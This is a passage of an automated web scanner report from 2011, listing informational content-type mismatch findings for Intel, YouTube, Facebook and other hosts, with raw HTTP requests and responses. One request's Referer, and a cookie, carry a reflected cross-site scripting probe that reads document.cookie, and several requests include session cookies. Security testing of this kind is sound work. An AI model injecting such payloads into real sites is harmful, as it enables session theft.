The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET / HTTP/1.1
Host: ad.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 05 Feb 2011 23:17:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 23:17:35 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tu=43a90b7fc41a5c241f48c5114ade8499; expires=Tue, 31-Dec-2019 23:00:00 GMT; path=/; domain=ad.com; httponly
Vary: User-Agent,Accept-Encoding
Content-Length: 6
Content-Type: text/html
X-Cache: MISS from 215860
Connection: close

<b-ua>

24.3. http://gdata.youtube.com/feeds/api/playlists/698CFFD6A87A1ACB/batch  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://gdata.youtube.com
Path:   /feeds/api/playlists/698CFFD6A87A1ACB/batch

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=UTF-8
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /feeds/api/playlists/698CFFD6A87A1ACB/batch HTTP/1.1
Host: gdata.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response

HTTP/1.1 400 Bad Request
X-GData-User-Country: FR
Content-Type: text/html; charset=UTF-8
Date: Sat, 05 Feb 2011 23:22:43 GMT
Expires: Sat, 05 Feb 2011 23:22:43 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close
Content-Length: 32

Invalid playlist video id: batch

24.4. http://itcenter.intel.com/sites/sitewide/survey/onsitegeo.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://itcenter.intel.com
Path:   /sites/sitewide/survey/onsitegeo.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: application/x-javascript
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /sites/sitewide/survey/onsitegeo.js HTTP/1.1
Host: itcenter.intel.com
Proxy-Connection: keep-alive
Referer: http://itcenter.intel.com/ResourceLibrary?4b801'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7e58a74ceab=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947643351; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility; __g_c=w%3A1%7Cb%3A2%7Cc%3A292332099732486%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __g_u=292332099732486_1_0.5_0_5_1297389080560_1

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 09 Jul 2009 21:48:31 GMT
Accept-Ranges: bytes
ETag: "b43a1f0df0ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 06 Feb 2011 01:50:49 GMT
Content-Length: 14

onSiteGeo='0';

24.5. http://newsroom.intel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain; charset=UTF-8
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; jive.recentHistory.-1=31342c323031363b; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296957112363; s_lv_s=Less%20than%201%20day; gpv_p18=supp%3Aen_us/support; s_sq=intelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA%26intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A,http%3A//www.intel.com/p/en_US/support%3Fiid%3Dhdr+support:Intel%AE%20Product%20Support; JSESSIONID=40825052A482B0715A2B702E24E968F1.node6IPR

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
ETag: W/"3638-1272415722000"
X-JAL: 1
Content-Length: 3638
CacheHit: D=2363 t=1296826291082904
X-JSL: D=2369 t=1296826291082904
Content-Type: text/plain; charset=UTF-8
Age: 131054
Date: Sun, 06 Feb 2011 01:55:45 GMT
Last-Modified: Wed, 28 Apr 2010 00:48:42 GMT
Connection: keep-alive

..............h...&... ..............(....... ...........@.............................B......U........p..o................Y..b...|4...............................e..........J..]........x.......S...
...[SNIP]...

24.6. http://newsroom.intel.com/opensearch.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /opensearch.xml

Issue detail

The response contains the following Content-type statement:
  • Content-Type: application/opensearchdescription+xml;charset=UTF-8
The response states that it contains script. However, it actually appears to contain XML.

Request

GET /opensearch.xml HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:39 GMT
Server: Apache
X-JAL: 3
CacheHit: D=32285 t=1296947679913708
X-JSL: D=32291 t=1296947679913708
Content-Type: application/opensearchdescription+xml;charset=UTF-8
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>Intel Newsroom</ShortName>
<Description>Search Intel Newsroom</Description
...[SNIP]...

24.7. http://newsroom.intel.com/themes/iprtheme/images/intel-logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /themes/iprtheme/images/intel-logo.gif

Issue detail

The response contains the following Content-type statement:
  • Content-Type: image/gif
The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /themes/iprtheme/images/intel-logo.gif HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "4.0.6-e873462083f8073a089a27747955f53d-5747"
X-JAL: 2
Content-Length: 5747
CacheHit: D=4420 t=1296014607078504
X-JSL: D=4425 t=1296014607078504
Cache-Control: max-age=2016000
Content-Type: image/gif
Age: 932939
Date: Sat, 05 Feb 2011 23:12:26 GMT
Last-Modified: Mon, 16 Aug 2010 05:56:59 GMT
Expires: Thu, 24 Feb 2011 00:01:22 GMT
Connection: keep-alive

......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222..........."..............................
...[SNIP]...

24.8. http://newsroom.intel.com/view-video-short.jspa  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /view-video-short.jspa

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html;charset=UTF-8
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /view-video-short.jspa HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:35 GMT
Server: Apache
X-JAL: 7
Content-Language: en-US
CacheHit: D=8583 t=1296947735675009
X-JSL: D=8588 t=1296947735675009
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

There was an error loading that video information.

24.9. http://onsite2.researchintel.com/engine/icorescript.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://onsite2.researchintel.com
Path:   /engine/icorescript.asp

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /engine/icorescript.asp?s=15&sid=&c=&geo=0&f=NONE HTTP/1.1
Host: onsite2.researchintel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/p/en_US/business?iid=gg_work-en_US+home_business_portal
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:12:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
cache-control: private
pragma: no-cache
Content-Length: 187
Content-Type: text/html
Expires: Thu, 03 Feb 2011 23:12:18 GMT
Set-Cookie: ASPSESSIONIDCSTRSASQ=DJKDPHKCHBEKBKLBIMAIHJGD; path=/
Cache-control: No-Store

clearTimeout(onsTimerB);function ONS_CoreSite(){ONS_sCookie(cn,'sid=9968985447329M1296947538033&stage=13',3,ch);ONS_showInvite();}onsUSID='9968985447329M1296947538033';ONS_initCore(true);

24.10. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php?api_key=4310e5850ea0577ea41506efdb019db0&extern=0&channel=http%3A%2F%2Fnewsroom.intel.com%2Fcommunity%2Fintel_newsroom%2F%3Fiid%3Dftr%2Bpress%26fbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sat, 05 Feb 2011 23:12:29 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

24.11. http://www.freedownloadscenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.freedownloadscenter.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.freedownloadscenter.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 23:23:15 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Fri, 05 Sep 2008 21:17:03 GMT
ETag: "672c0-47e-9740d1c0"
Keep-Alive: timeout=15, max=500
Content-Length: 1150

............ .h.......(....... ..... ............................................8.qC..n0..h ..j ..s3..xF...~8.............................yQ..f...f...i...k...j...i...k...r ...Q....................
.|
...[SNIP]...

24.12. http://www.google.com/buzz/api/button.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /buzz/api/button.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/javascript; charset=utf-8
The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /buzz/api/button.js HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=43=Cig5UOc1wv5sfNglqsyNnFFEHFTegiEsPcNcebZoaufNwyNg_IQMlCYN52J936mT_QhaGnP1ldozomC9pKE6pPObVlBzwrbZzma55sFIQ07o-FXH1wkI_XBsSCK3Q2fY; PREF=ID=11a9f75446a95c33:U=28a8b1ad565a039a:FF=0:TM=1293845297:LM=1296932041:GM=1:S=NDlWCWhRSX8WRFLQ

Response

HTTP/1.1 200 OK
Expires: Sat, 05 Feb 2011 23:16:38 GMT
Date: Sat, 05 Feb 2011 23:11:38 GMT
Last-Modified: Wed, 02 Feb 2011 18:49:21 GMT
Content-Type: text/javascript; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Age: 48
Cache-Control: public, max-age=300
Content-Length: 26685

if(!window.__google_buzz_loaded__){var google_buzz__base_url = 'http://www.google.com/buzz';
var google_buzz__img_url = 'http://www.gstatic.com/buzz/api/images';
var google_buzz__buzz_this_msgs={"ln":
...[SNIP]...

24.13. http://www.intc.com/common/download/download.cfm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.intc.com
Path:   /common/download/download.cfm

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /common/download/download.cfm?companyid=INTC&fileid=435133&filekey=ca2f8f41-2f9e-460e-8bae-20fd6415ab85&filename=Earnings Release plus Tables Q4'10.pdf HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:15:58 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

24.14. http://www.intc.com/common/mobile/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.intc.com
Path:   /common/mobile/

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=UTF-8
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /common/mobile/ HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


   <!-- Parameters Passed are Invalid (err: 102) -->
   

24.15. http://www.intc.com/releasedetail.cfm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.intc.com
Path:   /releasedetail.cfm

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /releasedetail.cfm?ReleaseID=546454&ReleasesType=Financial News HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:14:58 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

24.16. http://www.intel.com/Assets/en_US/Image/marquees/bg-top-support.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.intel.com
Path:   /Assets/en_US/Image/marquees/bg-top-support.png

Issue detail

The response contains the following Content-type statement:
  • Content-Type: image/png
The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /Assets/en_US/Image/marquees/bg-top-support.png HTTP/1.1
Host: www.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/p/en_US/support?iid=hdr+support
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
